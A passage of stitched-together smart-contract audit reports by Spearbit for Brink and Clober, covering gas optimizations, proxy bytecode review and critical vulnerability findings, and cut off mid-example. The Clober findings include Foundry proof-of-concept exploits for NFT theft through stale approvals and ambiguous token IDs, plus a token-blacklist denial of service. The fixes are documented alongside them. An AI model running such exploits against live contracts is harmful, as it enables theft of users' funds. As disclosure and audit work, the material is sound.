mentioned that currently these transactions are sent to the public mempool (via Alchemy). Assuming permissionless contracts are used all throughout, this leads to front-running risk, as anyone can copy the calldata for the transaction and front-run the transaction. The original executor’s transaction will still end up in the chain, except that the transaction would revert, leading to the executor paying for gas and getting nothing in return. Although front-running does not directly add security risk to the protocol, it indirectly affects it, as being an ex- ecutor becomes less profitable. Note that regardless of the front-running issue, 23 the problem of executors paying the gas for a failed transaction can still happen in practice. If there are multiple executors trying to concurrently send the same transaction to the mempool, only one of them can profit from the opportunity. One way to solve this issue is to use a service like flashbots. This offers two advantages: 1. The transaction will remain private in the mempool, i.e., font-running can be avoided. 2. You can configure to not include a transaction in the block if it reverts (this is the default configuration). This would prevent executors from paying gas for reverting transactions. Note: an alternative for (2) along with (1) is to use ethermine’s MEV relay. How- ever, it has a lower hash rate than Flashbots. Note: an alternative for (1) is to use taichi’s private transaction. 7 Appendix 7.1 Gas optimization: Use calldata instead of memory for func- tion parameters In some cases, having function arguments in calldata instead of memory is more optimal. Consider the following generic example: contract C { function add(uint[] memory arr) external returns (uint sum) { uint length = arr.length; for (uint i = 0; i < length; i++) { sum += arr[i]; } } } In the above example, the dynamic array arr has the storage location memory. When the function gets called externally, the array values are kept in calldata and copied to memory during ABI decoding (using the opcode calldataload and mstore). And during the for loop, arr[i] accesses the value in memory using a mload. However, for the above example this is inefficient. Consider the following snippet instead: 24 contract C { function add(uint[] calldata arr) external returns (uint sum) { uint length = arr.length; for (uint i = 0; i < length; i++) { sum += arr[i]; } } } In the above snippet, instead of going via memory, the value is directly read from calldata using calldataload. That is, there are no intermediate memory operations that carries this value. Gas savings: In the former example, the ABI decoding begins with copying value from calldata to memory in a for loop. Each iteration would cost at least 60 gas. In the latter example, this can be completely avoided. This will also reduce the number of instructions and therefore reduces the deploy time cost of the contract. In short, use calldata instead of memory if the function argument is only read. Note that in older Solidity versions, changing some function arguments from memory to calldata may cause “unimplemented feature error”. This can be avoided by using a newer (0.8.*) Solidity compiler. 25 diff --git a/findings_newupdate/spearbit/Brink-Spearbit-Security-Review-Engagement-2.txt b/findings_newupdate/spearbit/Brink-Spearbit-Security-Review-Engagement-2.txt new file mode 100644 index 0000000..10b212f --- /dev/null +++ b/findings_newupdate/spearbit/Brink-Spearbit-Security-Review-Engagement-2.txt @@ -0,0 +1,13 @@ +4.1.1 Inline assembly leaves dirty higher order bits for _proxyOwner vari- able Severity: Low, Gas optimization Context: Account.sol#L160-L165 function proxyOwner() internal view returns (address _proxyOwner) { assembly { extcodecopy(address(), mload(0x40), 0x2d, 0x14) _proxyOwner := mload(sub(mload(0x40), 0x0c)) } } The expression mload(sub(mload(0x40), 0x0c)) reads from memory location that was not directly used in the context of proxyOwner; more specifically, the memory location, starting from mload(0x40) - 0x0c until mload(0x40). Since the contents of this location cannot be predicted (Solidity does not clean up memory after use), the proxyOwner variable will have dirty higher order bits, i.e., the most significant 12 bytes (32 - 20) need not be zero. However, the compiler would clean up this value towards the end of the function, by doing _proxyOwner := and(2**160 - 1, _proxyOwner). Recommendation: Internally, the Solidity compiler tries to be careful about not leaving dirty higher order bits. Many critical compiler bugs are often the result of the compiler miss- ing such cleanups. We recommend using right shift (shr) to properly clean the value read from memory. extcodecopy(address(), mload(0x40), 0x2d, 0x14) _proxyOwner := shr(0x60, mload(mload(0x40))) This also saves some gas. Note: The SHR (EIP-145) instruction was introduced the same time as CRE- ATE2, and since the project relies on CREATE2 (EIP-1014), this change should not cause any issues, while deploying on other EVM compatible chains. These changes were introduced in the Petersburg hardfork. For deploying on EVM- compatible chains, we recommend documenting this requirement. 4 A proof of concept is provided in the appendix. Brink: Fixed in PR #43. Spearbit: Resolved. +4.1.2 The function deployAndCall may silently fail during account cre- ation Severity: Low Context: 1. AccountFactory.sol#L23. 2. DeployAndCall.sol#L17 The function deployAndCall relies on AccountFactory.deployAccount to create a new account and to return its address. This function currently just passes through the return value of the underlying CREATE2 instruction. This instruction will return the value 0 in certain failure cases. The function deployAndCall will then call this newly created account if call- Data.length > 0. In case of a CREATE2 failure this will result in calling ad- dress(0), successfully. One quirky failure condition of CREATE2 resulting in 0 is when it runs out of call depth, i.e. it is the 1024th call in the transaction frame. This is fairly easy to accumplish by a malicious actor. In this case deployAndCall will silently fail. Recommendation: A suggested remedy is to have a require(account != 0); statement in Ac- countFactory.deployAccount. Reference: yellowpaper. Brink: Fixed in PR #47. Spearbit: Resolved. 4.2 Gas Optimizations and Informational +4.2.1 Hardcode mload(initCode) to save 3 gas Severity: Gas Optimization 5 Context: AccountFactory.sol#L23. @@ -20,7 +20,7 @@ contract AccountFactory { owner ); assembly { - + account := create2(0, add(initCode, 0x20), mload(initCode), SALT) account := create2(0, add(initCode, 0x20), 0x4B, SALT) } } } +4.2.2 Use scratch space in proxyOwner to save gas Severity: Gas Optimization Context: Account.sol#L163 Recap the suggested code from the first issue above: extcodecopy(address(), mload(0x40), 0x2d, 0x14) _proxyOwner := shr(0x60, mload(mload(0x40))) This currently relies on the free memory pointer, which is the adviseable way to use memory. However, for short memory requirements, it is possible to use the so called scratch space. From the Layout in Memory section of the Solidity documentation: Scratch space can be used between statements (i.e. within inline assembly). A possible code making use of this is the following: extcodecopy(address(), 0, 0x2d, 0x14) _proxyOwner := shr(0x60, mload(0)) Note that this saves two MLOADs. Note: While Solidity has not changed the memory layout and these reserved slots for a very long time, it cannot be guaranteed that this will be the case in the future. For this reason we also recommend to leave a comment in the code should this change be enacted. Brink: Fixed in PR #47. Spearbit: Resolved. 6 +4.2.3 Saving 1 byte off the constructor code Severity: Informational Context: AccountFactory.sol#L19 The following is the current constructor for the account: Stack Opcode PC 00000 RETURNDATASIZE [0] 00001 PUSH1 0x41 00003 DUP1 00004 PUSH1 0x0a 00006 RETURNDATASIZE [0, 0x0a, 0x41, 0x41, 0] 00007 CODECOPY 00008 DUP2 00009 RETURN [0x41, 0] [0x41, 0x41, 0] [0x0a, 0x41, 0x41, 0] [0x41, 0] [0, 0x41, 0] [0] However, the dup2 before the return indicates a possible optimization by re- arranging the stack. Here, the number 0x0a denotes the offset of the runtime code. Let’s denote this by offset, then the following would be a more optimal constructor code: Opcode Stack [0x41] PC 00000 PUSH1 0x41 00002 RETURNDATASIZE [0, 0x41] 00003 DUP2 00004 PUSH1 offset 00006 RETURNDATASIZE [0, offset, 0x41, 0, 0x41] 00007 CODECOPY 00008 RETURN [0x41, 0, 0x41] [offset, 0x41, 0, 0x41] [0, 0x41] [] Brink: Fixed in PR #47. Spearbit: Resolved. +4.2.4 Vanity address optimization Severity: Gas optimization By finding the appropriate salt for the implementation contract, to make the de- ployment address have as many zeros as possible, it is possible to save gas for 7 the account factory deployment. This is because one can replace push20 20- byte-constant to say, push16 16-byte-constant. The latter is 4 bytes shorter than the former, and therefore decreases gas cost for deployment. The follow- ing tool can be used to search for create2 vanity addresses: ERADICATE2 Generally the more time is available for the search, the probability of finding increasing number of leading zeroes goes up. Attaining 2 leading zeroes should be a matter of seconds. Note: the code of the minimal proxy as well as the code in proxyOwner() needs to be updated to support a short address. Note: a vanity address is most relevant for the Address.sol. It might also have a slight advantage for the verifiers. For the minimal proxy, which is deployed per user, it is not important. Brink: Fixed in PR #47. Spearbit: Resolved. +4.2.5 Use bytes.concat instead of abi.encodePacked Severity: Informational Context: AccountFactory.sol#L16-L21 Since 0.8.4 it is possible to use bytes.concat, which expects literals, bytes, and bytesNN inputs, and is aimed to replace most use cases of abi.encodePacked. It is more expressive, avoids the complex rules of abi.encodePacked, and the latter is expected to be phased out in the future. This suggestion applies throughout the code, but especially in AccountFac- tory.deployAccount, where this would improve readability for showing the lay- out clearly: - - - - + + + + bytes memory initCode = abi.encodePacked( .... owner ); bytes memory initCode = bytes.concat( .... bytes20(owner) ); 8 +4.2.6 Use
.code.length instead of extcodesize in inline assem- bly Severity: Informational Context: SaltedDeployer.sol#L48-L58 function _isContract(address account) internal view returns (bool) { // This method relies on extcodesize, which returns 0 for contracts in construction, since the code is only stored ,! // at the end of the constructor execution. uint256 size; assembly { size := extcodesize(account) } return size > 0; return account.code.length > 0; - - - - - - + } } Note: In the past (before 0.8.1), this was inefficient (Solidity used to do an extcodecopy to copy the entire code to memory and then calculate the size of this byte array in memory instead of directly using extcodesize). But since 0.8.1, Solidity would avoid the memory copy and only use extcodesize. Brink: Fixed in PR #47. Spearbit: Resolved. +4.2.7 Use file-level constant for SALT Severity: Informational Context: 1. AccountFactory.sol#L9. 2. SaltedDeployer.sol#L20. /// @dev Salt used for salted deployments bytes32 constant SALT = ,! 0x841eb53dae7d7c32f92a7e2a07956fb3b9b1532166bc47aa8f091f49bcaa9ff5; This salt is duplicated in both the contracts Account/AccountFactory.sol and Deployers/SaltedDeployer.sol. 9 It may make sense placing the SALT as a file-level constant in AccountFactory and using that in SaltedDeployer. This would reduce the risk of mismatched salt during future changes. Brink: No longer relevant after the salt was set to 0 in AccountFactory. Spearbit: Resolved. +4.2.8 Use constants for offsets in proxyOwner Severity: Informational Context: Account.sol#L162 extcodecopy(address(), mload(0x40), 0x2d, 0x14) The offset 0x2d is hardcoded in Account, but it relies on the layout provided by It may make sense provide a file-level constant in Account- AccountFactory. Factory.sol and use that: uint256 constant PROXY_OWNER_OFFSET = 0x2d; This would reduce the risk of mismatched offsets during future changes. +4.2.9 Document that the variable callData must have location memory in the function deployAndCall Severity: Informational Context: DeployAndCall.sol#L16 In Batched/DeployAndCall.sol the function function deployAndCall(address owner, bytes memory callData) external payable; has the variable callData marked as memory. By purely looking at the function signature, one would suggest to use the calldata location specifier here. This would be incorrect, because the function body uses assembly code relying on the memory layout caused by the memory specifier. It is suggested to include a comment in the code to ensure the location remains unchanged. 10 +4.2.10 Document that deployAndCall may not call the created account Severity: Informational Context: DeployAndCall.sol#L15 In Batched/DeployAndCall.sol the function deployAndCall(address owner, bytes memory callData) deploys a new account and calls into it. While it always de- ploys a new account, it only calls into it if the callData is non-empty. It is adviseable to document this feature in the NatSpec description. +4.2.11 Using underscores to improve readability of hex value Severity: Informational Context: AccountFactory.sol#L19 Adding underscore as delimiters improves the readability. @@ -15,8 +15,8 @@ contract AccountFactory { /// address added to the deployed bytecode. The owner address can be read within a delegatecall by using `extcodecopy` ,! function deployAccount(address owner) external returns (address account) { - - + + bytes memory initCode = abi.encodePacked( // [*** constructor **][**** eip-1167 ****]... hex'3d604180600a3d3981f3363d3d373d3d3d363d73... // [*** constructor **]_[**** eip-1167 ****]_... hex'3d604180600a3d3981f3_363d3d373d3d3d363d73_... owner ); assembly { Brink: Fixed in PR #47. Spearbit: Resolved. 5 Custom proxy code The contract implements a slightly customized version of the EIP-1167 proxy contract. 11 5.1 Difference to EIP-1167 The main change is to include an owner address to be used for NotOwner checks. This is accomplished with concatenating the address owner to the end of the deployed code. It is done without padding. Two main concerns arise here: 1. Is it possible for execution to flow into data (the owner address)? 2. Is the address correctly and efficiently read in the NotOwner check? The second question has been addressed in the section "use scratch space". Regarding the first question we need to note that the EVM has no native support for code/data separation, but several proposals are aimed at providing it (e.g. EIP-2327 and EIP-3540). Save this, we can analyze the control flow. The only control flow instruction is JUMPI, which is immediately preceded with a PUSH1 instruction. We can call this a static jump, and conclude that both the destination (the jump) and falling through end up at RETURN or REVERT, respectively. Also note that several other preceding instructions could abort via various reasons. One best practice the Solidity compiler does is the insertion of a special marker, the INVALID (0xfe) instruction, between code and data. This could be done here too, with little benefit. 5.2 Deploy-time The deploy time code is similar to one in an earlier version of EIP-1167. We have suggested a gas optimisation in the section "saving 1 byte off the con- structor code". See also comments in ethereum-magicians. 5.3 Runtime The runtime code prior to the audit is identical to the one suggested in EIP- 1167. We suggest to consider vanity addresses in the section "vanity address optimization". This suggestion is also mentioned in the EIP. Additionally one could consider a further optimisation of reordering the stack layout to save on SWAP/DUP instructions. A method has been described in this coinmonks article. 12 5.4 Remarks The EIP-1167 proxy code is not easily readable due to optimisations. The vary- ing costs of instructions motivates unconventional code, e.g. DUPn and SWAPn costs 3 gas, while RETURNDATASIZE only costs 2 and is initially set to 0, but can turn to non-zero after certain instructions. Using RETURNDATASIZE is a common practice, but it doesn’t come without risks. Proposals could change the semantics of this instruction in certain cases. While this is unlikely to happen, proposals like EIP-2733 do have a slight chance as they do not break existing contract executions, only if they are used in a certain way. While it is likely a futile attempt to be entirely future proof, one could consider other instructions, such as MSIZE (before memory expansion this returns 0), PC (is 0 as the first instruction), and using DUPn more (which comes at a slight gas increase). 13 6 Appendix 6.1 Proof of concept for dirty higher order bits pragma abicoder v1; contract Test { bytes32 constant SALT = ,! 0x841eb53dae7d7c32f92a7e2a07956fb3b9b1532166bc47aa8f091f49bcaa9ff5; address constant random_address = 0x94324fcF2cC42F702F7dCBEe5e61E947DC9e2D91; address immutable proxy = deployAccount(random_address); uint256 constant junk = type(uint256).max; /// deployAccount from AccountFactory. function deployAccount(address owner) internal returns (address account) { ... } /// Note: returns bytes32 instead of address; /// so that the compiler does not perform cleanup. function proxyOwner(address _proxy) internal view returns (bytes32 ,! _proxyOwner) { assembly { extcodecopy(_proxy, mload(0x40), 0x2d, 0x14) _proxyOwner := mload(sub(mload(0x40), 0x0c)) } } /// returns /// 0xffffffffffffffffffffffff94324fcf2cc42f702f7dcbee5e61e947dc9e2d91 /// instead of /// 0x94324fcf2cc42f702f7dcbee5e61e947dc9e2d91 function test() external returns (bytes32) { assembly { // Store junk at the current free memory mstore(mload(0x40), junk) // Increment the free memory pointer mstore(0x40, add(mload(0x40), 0x20)) } return proxyOwner(proxy); } } 14 diff --git a/findings_newupdate/spearbit/Clober-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Clober-Spearbit-Security-Review.txt new file mode 100644 index 0000000..d8fd941 --- /dev/null +++ b/findings_newupdate/spearbit/Clober-Spearbit-Security-Review.txt @@ -0,0 +1,57 @@ +5.1.1 OrderBook Denial of Service leveraging blacklistable tokens like USDC Severity: Critical Risk Context: OrderBook.sol#L649-L666 - audit commit OrderBook.sol#L687-L706 - dev commit Description: The issue was spotted while analysing additional impact and fix for 67 Proof of concept checked with the original audit commit: 28062f477f571b38fe4f8455170bd11094a71862 and the newest available commit from dev branch: 2ed4370b5de9cec5c455f5485358db194f093b01 Due to the architecture decision which implements orders queue as a cyclic buffer the OrderBook after reaching MAX_ORDERS (~32k) for a given price point, starts to overwrite stale orders. If an order was never claimed or it is broken, so it cannot be claimed, it is not possible to place a new order in a queue. This emerges due to a fact that it is not possible to finalize the stale order and deliver the underlying assets, what is done while placing a new and replacing a stale order. Effectively this issue can be used to block the main functionality of the OrderBook, so placing new orders for a given price point. Only a single broken order per price-point is enough to lead to this condition. The issue will not be immediately visible as it requires the cyclic buffer to make a circle and encounter the broken order. The proof of concept in SecurityAuditTests.sol attachment implements a simple scenario where a USDC-like mock token is used: 1. Mallory creates one ASK order at some price point (to sell X base tokens for Y quoteTokens). 2. Mallory transfers ownership of the OrderNFT token to an address which is blacklisted by quoteToken (e.g. USDC) 3. Orders queue implemented as a circular buffer over time overflows and starts replacing old orders. 4. When it is the time to replace the order the quoteToken is about to be transferred, but due to the blacklist the assets cannot be delivered. 5. At this point it is impossible to place new orders at this price index, unless the owner of the OrderNFT transfers it to somebody who can receive quoteToken. Proof of concept result for the newest 2ed4370b5de9cec5c455f5485358db194f093b01 commit: # $ git clone ... && git checkout 2ed4370b5de9cec5c455f5485358db194f093b01 # $ forge test -m "test_security_BlockOrderQueueWithBlacklistableToken" [25766] MockOrderBook::limitOrder(0x0000000000000000000000000000000000004444, 3, 0, ,! 333333333333333334, 2, 0x) [8128] OrderNFT::onBurn(false, 3, 0) [1448] MockOrderBook::getOrder((false, 3, 0)) [staticcall] ← (1, 0, 0x00000000000000000000000000000000DeaDBeef) emit Approval(owner: 0x00000000000000000000000000000000DeaDBeef, approved: 0x0000000000000000000000000000000000000000, tokenId: 20705239040371691362304267586831076357353326916511159665487572671397888) emit Transfer(from: 0x00000000000000000000000000000000DeaDBeef, to: 0x0000000000000000000000000000000000000000, tokenId: 20705239040371691362304267586831076357353326916511159665487572671397888) ← () emit ClaimOrder(claimer: 0x0000000000000000000000000000000000004444, user: 0x00000000000000000000000000000000DeaDBeef, rawAmount: 1, bountyAmount: 0, orderIndex: 0, priceIndex: 3, isBase: false) [714] MockSimpleBlockableToken::transfer(0x00000000000000000000000000000000DeaDBeef, 10000) ,! ,! ,! ,! ,! ,! ← "blocked" ← "blocked" ← "blocked" 5 In real life all *-USDC and USDC-* pairs as well as other pairs where a single token implements a block list are affected. The issue is also appealing to the attacker as at any time if the attacker controls the blacklisted wallet address, he/she can transfer the unclaimable OrderNFT to a whitelisted address to claim his/her assets and to enable processing until the next broken order is placed in the cyclic buffer. It can be used either to manipulate the market by blocking certain types of orders per given price points or simply to blackmail the DAO to resume operations. Recommendation: Prevent blocking condition by removing forced transfers in claim while replacing stale orders. Clober: Fixed clober-dex/core/pull/363. Spearbit: Fix verified. A global _orders mapping allowing to store unique orders was added, so it is no longer needed to force claim and transfer while replacing a stale order. makeOrder() ensures that the stale order has been fully filled before replacing it. When claiming for the stale order, _calculateClaimableRawAmount returns the stale order's filled amount. if (orderKey.orderIndex + _MAX_ORDER < queue.index) { // replaced order return orderOpenAmount; } +5.1.2 Overflow in SegmentedSegmentTree464 Severity: Critical Risk Context: SegmentedSegmentTree464.sol#L173 Description: SegmentedSegmentTree464.update needs to perform an overflow check in case the new value is greater than the old value. This overflow check is done when adding the new difference to each node in each layer (using addClean). Furthermore, there's a final overflow check by adding up all nodes in the first layer in total(core). However, in total, the nodes in individual groups are added using DirtyUint64.sumPackedUnsafe: function total(Core storage core) internal view returns (uint64) { return DirtyUint64.sumPackedUnsafe(core.layers[0][0], 0, _C) + DirtyUint64.sumPackedUnsafe(core.layers[0][1], 0, _C); } The nodes in a group can overflow without triggering an overflow & revert. The impact is that the order book depth and claim functionalities break for all users. 6 // SPDX-License-Identifier: BUSL-1.1 pragma solidity ^0.8.0; import "forge-std/Test.sol"; import "forge-std/StdJson.sol"; import "../../contracts/mocks/SegmentedSegmentTree464Wrapper.sol"; contract SegmentedSegmentTree464Test is Test { using stdJson for string; uint32 private constant _MAX_ORDER = 2**15; SegmentedSegmentTree464Wrapper testWrapper; function setUp() public { testWrapper = new SegmentedSegmentTree464Wrapper(); } function testTotalOverflow() public { uint64 half64 = type(uint64).max / 2 + 1; testWrapper.update(0, half64); // map to the right node of layer 0, group 0 testWrapper.update(_MAX_ORDER / 2 - 1, half64); assertEq(testWrapper.total(), 0); } } Recommendation: Perform a safe addition for the first layer and rewrite the overflow check. // DirtyUint64.sumPackedSafe still needs to be implemented and should do checked addition require( uint256(DirtyUint64.sumPackedSafe(core.layers[0][0], 0, _C)) + uint256(DirtyUint64.sumPackedSafe(core.layers[0][1], 0, _C)) <= type(uint64).max, "TREE_MAX" ); Clober: Fixed in PR 40. Spearbit: Verified. The fix checks whether the new updated value can cause an overflow and throws the error early preventing such operations. +5.1.3 OrderNFT theft due to controlling future and past tokens of same order index Severity: Critical Risk Context: OrderBook.sol#L410, OrderNFT.sol#L285 Description: The order queue is implemented as a ring buffer, to get an order (Orderbook.getOrder) the index in the queue is computed as orderIndex % _MAX_ORDER. The owner of an OrderNFT also uses this function. function _getOrder(OrderKey calldata orderKey) internal view returns (Order storage) { return _getQueue(orderKey.isBid, orderKey.priceIndex).orders[orderKey.orderIndex & _MAX_ORDER_M]; } CloberOrderBook(market).getOrder(decodeId(tokenId)).owner Therefore, the current owner of the NFT of orderIndex also owns all NFTs with orderIndex + k * _MAX_ORDER. An attacker can set approvals of future token IDs to themself. These approvals are not cleared on OrderNFT.onMint when a victim mints this future token ID, allowing the attacker to steal the NFT and cancel the NFT to claim their tokens. 7 // SPDX-License-Identifier: BUSL-1.1 pragma solidity ^0.8.0; import "forge-std/Test.sol"; import "../../../../contracts/interfaces/CloberMarketSwapCallbackReceiver.sol"; import "../../../../contracts/mocks/MockQuoteToken.sol"; import "../../../../contracts/mocks/MockBaseToken.sol"; import "../../../../contracts/mocks/MockOrderBook.sol"; import "../../../../contracts/markets/VolatileMarket.sol"; import "../../../../contracts/OrderNFT.sol"; import "../utils/MockingFactoryTest.sol"; import "./Constants.sol"; contract ExploitsTest is Test, CloberMarketSwapCallbackReceiver, MockingFactoryTest { struct Return { address tokenIn; address tokenOut; uint256 amountIn; uint256 amountOut; uint256 refundBounty; } struct Vars { uint256 inputAmount; uint256 outputAmount; uint256 beforePayerQuoteBalance; uint256 beforePayerBaseBalance; uint256 beforeTakerQuoteBalance; uint256 beforeOrderBookEthBalance; } MockQuoteToken quoteToken; MockBaseToken baseToken; MockOrderBook orderBook; OrderNFT orderToken; function setUp() public { quoteToken = new MockQuoteToken(); baseToken = new MockBaseToken(); } function cloberMarketSwapCallback( address tokenIn, address tokenOut, uint256 amountIn, uint256 amountOut, bytes calldata data ) external payable { if (data.length != 0) { Return memory expectedReturn = abi.decode(data, (Return)); assertEq(tokenIn, expectedReturn.tokenIn, "ERROR_TOKEN_IN"); assertEq(tokenOut, expectedReturn.tokenOut, "ERROR_TOKEN_OUT"); assertEq(amountIn, expectedReturn.amountIn, "ERROR_AMOUNT_IN"); assertEq(amountOut, expectedReturn.amountOut, "ERROR_AMOUNT_OUT"); assertEq(msg.value, expectedReturn.refundBounty, "ERROR_REFUND_BOUNTY"); } IERC20(tokenIn).transfer(msg.sender, amountIn); } 8 function _createOrderBook(int24 makerFee, uint24 takerFee) private { orderToken = new OrderNFT(); orderBook = new MockOrderBook( address(orderToken), address(quoteToken), address(baseToken), 1, 10**4, makerFee, takerFee, address(this) ); orderToken.init("", "", address(orderBook), address(this)); uint256 _quotePrecision = 10**quoteToken.decimals(); quoteToken.mint(address(this), 1000000000 * _quotePrecision); quoteToken.approve(address(orderBook), type(uint256).max); uint256 _basePrecision = 10**baseToken.decimals(); baseToken.mint(address(this), 1000000000 * _basePrecision); baseToken.approve(address(orderBook), type(uint256).max); } function _buildLimitOrderOptions(bool isBid, bool postOnly) private pure returns (uint8) { return (isBid ? 1 : 0) + (postOnly ? 2 : 0); } uint256 private constant _MAX_ORDER = 2**15; // 32768 uint256 private constant _MAX_ORDER_M = 2**15 - 1; // % 32768 function testExploit2() public { _createOrderBook(0, 0); address attacker = address(0x1337); address attacker2 = address(0x1338); address victim = address(0xbabe); // Step 1. Attacker creates an ASK limit order and receives NFT uint16 priceIndex = 100; uint256 orderIndex = orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({ user: attacker, priceIndex: priceIndex, rawAmount: 0, baseAmount: 1e18, options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY), data: new bytes(0) }); // Step 2. Given the `OrderKey` which represents the created limit order, an attacker can craft ,! ambiguous tokenIds CloberOrderBook.OrderKey memory orderKey = CloberOrderBook.OrderKey({isBid: false, priceIndex: priceIndex, orderIndex: orderIndex}); uint256 currentTokenId = orderToken.encodeId(orderKey); orderKey.orderIndex += _MAX_ORDER; uint256 futureTokenId = orderToken.encodeId(orderKey); // Step 3. Attacker approves the futureTokenId to themself, and cancels the current id vm.startPrank(attacker); orderToken.approve(attacker2, futureTokenId); CloberOrderBook.OrderKey[] memory orderKeys = new CloberOrderBook.OrderKey[](1); orderKeys[0] = orderKey; orderKeys[0].orderIndex = orderIndex; // restore original orderIndex 9 orderBook.cancel(attacker, orderKeys); vm.stopPrank(); // Step 4. attacker fills queue, victim creates their order recycles orderIndex 0 uint256 victimOrderSize = 1e18; for(uint256 i = 0; i < _MAX_ORDER; i++) { orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({ user: i < _MAX_ORDER - 1 ? attacker : victim, priceIndex: priceIndex, rawAmount: 0, baseAmount: victimOrderSize, options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY), data: new bytes(0) }); } assertEq(orderToken.ownerOf(futureTokenId), victim); // Step 5. Attacker steals the NFT and can cancel to receive the tokens vm.startPrank(attacker2); orderToken.transferFrom(victim, attacker, futureTokenId); vm.stopPrank(); assertEq(orderToken.ownerOf(futureTokenId), attacker); uint256 baseBalanceBefore = baseToken.balanceOf(attacker); vm.startPrank(attacker); orderKeys[0].orderIndex = orderIndex + _MAX_ORDER; orderBook.cancel(attacker, orderKeys); vm.stopPrank(); assertEq(baseToken.balanceOf(attacker) - baseBalanceBefore, victimOrderSize); } } Recommendation: The approvals should be cleared on onMint, similar to onBurn. The owner must not control any future or past, already burned, tokens that map to the same index mod _MAX_ORDER. This must be fully prevented to mitigate this attack. Revert in getOrder if the orderKey maps to an NFT that has already been burned or not been minted yet. See Order owner isn't zeroed after burning's recommendation to correctly detect burned tokens. 10 function onMint( address to, bool isBid, uint16 priceIndex, uint256 orderIndex ) external onlyOrderBook { require(to != address(0), Errors.EMPTY_INPUT); uint256 tokenId = _encodeId(isBid, priceIndex, orderIndex); // Clear approvals _approve(to, address(0), tokenId); _increaseBalance(to); emit Transfer(address(0), to, tokenId); + + } uint256 currentIndex = _getQueue(orderKey.isBid, orderKey.priceIndex).index; // valid active tokens are [currentIndex - _MAX_ORDER, currentIndex) require(orderKey.orderIndex < currentIndex, Errors.NFT_INVALID_ID); if (currentIndex >= _MAX_ORDER) { function _getOrder(OrderKey calldata orderKey) internal view returns (Order storage) { + + + + + + require(orderKey.orderIndex >= currentIndex - _MAX_ORDER, Errors.NFT_INVALID_ID); } return _getQueue(orderKey.isBid, orderKey.priceIndex).orders[orderKey.orderIndex & _MAX_ORDER_M]; } Clober: Due to this issue, I think it would be better to implement the orderIndex validation logic suggested by you at _getOrder function, to all external functions that receive orderIndex/orderKey. Fixed in PR 352. Spearbit: Fixed. The approval reset is not done in onMint but as discussed, it shouldn't be needed if nobody can control unminted tokens. Furthermore, the fix to OrderBook Denial of Service leveraging blacklistable tokens like USDC ensures that each order index is now unique. +5.1.4 OrderNFT theft due to ambiguous tokenId encoding/decoding scheme Severity: Critical Risk Context: OrderNFT.sol#L249-L274 OrderNFT.sol#L70-L74 OrderNFT.sol#L82-L89 Description: The encodeId() uniquely encodes OrderKey to a uin256 number. However, decodeId() ambigu- ously can decode many tokenId's to the exact same OrderKey. This can be problematic due to the fact that contract uses tokenId's to store approvals. The ambiguity comes from converting uint8 value to bool isBid value here function decodeId(uint256 id) public pure returns (CloberOrderBook.OrderKey memory) { uint8 isBid; uint16 priceIndex; uint232 orderIndex; assembly { orderIndex := id priceIndex := shr(232, id) isBid := shr(248, id) } return CloberOrderBook.OrderKey({isBid: isBid == 1, priceIndex: priceIndex, orderIndex: orderIndex}); ,! } (note that the attack is possible only for ASK limit orders) 11 Proof of Concept // Step 1. Attacker creates an ASK limit order and receives NFT uint16 priceIndex = 100; uint256 orderIndex = orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({ user: attacker, priceIndex: priceIndex, rawAmount: 0, baseAmount: 10**18, options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY), data: new bytes(0) }); // Step 2. Given the `OrderKey` which represents the created limit order, an attacker can craft ambiguous tokenIds ,! CloberOrderBook.OrderKey memory order_key = CloberOrderBook.OrderKey({isBid: false, priceIndex: priceIndex, orderIndex: orderIndex}); ,! uint256 tokenId = orderToken.encodeId(order_key); uint256 ambiguous_tokenId = tokenId + (1 << 255); // crafting ambiguous tokenId // Step 3. Attacker approves both victim (can be a third-party protocol like OpenSea) and his other account ,! vm.startPrank(attacker); orderToken.approve(victim, tokenId); orderToken.approve(attacker2, ambiguous_tokenId); vm.stopPrank(); // Step 4. Victim transfers the NFT to the themselves. (Or attacker trades it) vm.startPrank(victim); orderToken.transferFrom(attacker, victim, tokenId); vm.stopPrank(); // Step 5. Attacker steals the NFT vm.startPrank(attacker2); orderToken.transferFrom(victim, attacker2, ambiguous_tokenId); vm.stopPrank(); Recommendation: Validate the decoded uint8 value to be either 0 or 1 which unambiguously converts to bid and ask respectively. Clober: Fixed in commit 22b9a233. Spearbit: Fixed. 12 5.2 High Risk +5.2.1 Missing owner check on from when transferring tokens Severity: High Risk Context: OrderNFT.sol#L207 Description: The OrderNFT.transferFrom/safeTransferFrom use the internal _transfer function. While they check approvals on msg.sender through _isApprovedOrOwner(msg.sender, tokenId), it is never checked that the specified from parameter is actually the owner of the NFT. An attacker can decrease other users' NFT balances, making them unable to cancel or claim their NFTs and locking users' funds. The attacker transfers their own NFT passing the victim as from by calling transfer- From(from=victim, to=attackerAccount, tokenId=attackerTokenId). This passes the _isApprovedOrOwner check, but reduces from's balance. Recommendation: Add the following check to _transfer require(ownerOf(tokenId) == from, Errors.ACCESS); Clober: Fixed PR 310. Spearbit: Verified. Ownership check added. +5.2.2 Wrong minimum net fee check Severity: High Risk Context: MarketFactory.sol#L79, MarketFactory.sol#L111 Description: A minimum net fee was introduced that all markets should comply by such that the protocol earns fees. The protocol fees are computed takerFee + makerFee and the market factory computes the wrong check. Fee pairs that should be accepted are currently not accepted, and even worse, fee pairs that should be rejected are currently accepted. Market creators can avoid collecting protocol fees this way. Recommendation: Implement a takerFee + makerFee >= minNetFee check instead: require(int256(uint256(takerFee)) + makerFee >= minNetFee, Errors.INVALID_FEE); Clober: Fixed in PR 307, PR 308 and PR 311. Spearbit: Fixed. Condition has been inverted for the use of custom errors. if (marketHost != owner && int256(uint256(takerFee)) + makerFee < int256(uint256(minNetFee))) { revert Errors.CloberError(Errors.INVALID_FEE); +5.2.3 Rounding up of taker fees of constituent orders may exceed collected fee Severity: High Risk Context: OrderBook.sol#L463 OrderBook.sol#L478-L482 OrderBook.sol#L604 Description: If multiple orders are taken, the taker fee calculated is rounded up once, but that of each taken maker order could be rounded up as well, leading to more fees accounted for than actually taken. Example: • takerFee = 100011 (10.0011%) • 2 maker orders of amounts 400000 and 377000 • total amount = 400000 + 377000 = 777000 • Taker fee taken = 777000 * 100011 / 